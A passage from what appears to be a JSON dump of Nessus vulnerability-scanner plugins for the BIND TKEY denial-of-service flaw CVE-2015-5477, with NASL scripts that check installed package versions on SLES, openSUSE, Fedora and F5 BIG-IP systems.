preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-chrootenv-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-devel-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-doc-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-libs-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-utils-9.6ESVR11P1-0.14.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:07:03", "description": "An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit. 
(CVE-2015-5477)", "cvss3": {"score": null, "vector": null}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : BIND vulnerability (K16909)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-01-04T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL16909.NASL", "href": "https://www.tenable.com/plugins/nessus/86011", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K16909.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86011);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"F5 Networks BIG-IP : BIND vulnerability (K16909)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An error in the handling of TKEY queries can be exploited by an\nattacker for use as a denial-of-service vector, as a constructed\npacket can use the defect to trigger a REQUIRE assertion failure,\ncausing BIND to exit. 
(CVE-2015-5477)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16909\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K16909.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K16909\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.4.0-11.5.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# 
LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\",\"11.6.0\",\"11.2.0-11.5.3\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\",\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"11.0.0-11.1.0\",\"10.1.0-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.1.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.2.4HF12\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.2.4HF12\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:06", "description": "bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\nExposure to this issue can not be 
prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bind (openSUSE-2015-530)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bind", "p-cpe:/a:novell:opensuse:bind-chrootenv", "p-cpe:/a:novell:opensuse:bind-debuginfo", "p-cpe:/a:novell:opensuse:bind-debugsource", "p-cpe:/a:novell:opensuse:bind-devel", "p-cpe:/a:novell:opensuse:bind-libs", "p-cpe:/a:novell:opensuse:bind-libs-32bit", "p-cpe:/a:novell:opensuse:bind-libs-debuginfo", "p-cpe:/a:novell:opensuse:bind-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bind-lwresd", "p-cpe:/a:novell:opensuse:bind-lwresd-debuginfo", "p-cpe:/a:novell:opensuse:bind-utils", "p-cpe:/a:novell:opensuse:bind-utils-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-530.NASL", "href": "https://www.tenable.com/plugins/nessus/85187", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-530.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85187);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"openSUSE Security Update : bind (openSUSE-2015-530)\");\n script_summary(english:\"Check for the openSUSE-2015-530 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 
value:\n\"bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=939567\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-lwresd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-lwresd-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-chrootenv-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-debuginfo-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-debugsource-9.9.4P2-2.14.1\") ) flag++;\nif 
( rpm_check(release:\"SUSE13.1\", reference:\"bind-devel-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-libs-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-libs-debuginfo-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-lwresd-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-lwresd-debuginfo-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-utils-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-utils-debuginfo-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bind-libs-debuginfo-32bit-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-chrootenv-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-debuginfo-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-debugsource-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-devel-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-libs-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-libs-debuginfo-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-lwresd-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-lwresd-debuginfo-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-utils-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-utils-debuginfo-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-2.7.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bind-libs-debuginfo-32bit-9.9.6P1-2.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chrootenv / bind-debuginfo / bind-debugsource / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:16", "description": "Update to 9.10.2-P3 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-03T00:00:00", "type": "nessus", "title": "Fedora 22 : bind-9.10.2-4.P3.fc22 (2015-12335)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-12335.NASL", "href": "https://www.tenable.com/plugins/nessus/85170", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12335.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85170);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FEDORA\", value:\"2015-12335\");\n\n script_name(english:\"Fedora 22 : bind-9.10.2-4.P3.fc22 (2015-12335)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 9.10.2-P3 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1247361\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163006.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e330efe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"bind-9.10.2-4.P3.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:17", "description": "Include fix for CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-03T00:00:00", "type": "nessus", "title": "Fedora 21 : bind-9.9.6-10.P1.fc21 (2015-12357)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-12357.NASL", "href": "https://www.tenable.com/plugins/nessus/85171", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12357.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85171);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FEDORA\", value:\"2015-12357\");\n\n script_name(english:\"Fedora 21 : bind-9.9.6-10.P1.fc21 (2015-12357)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Include fix for CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1247361\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163007.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d30ea575\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 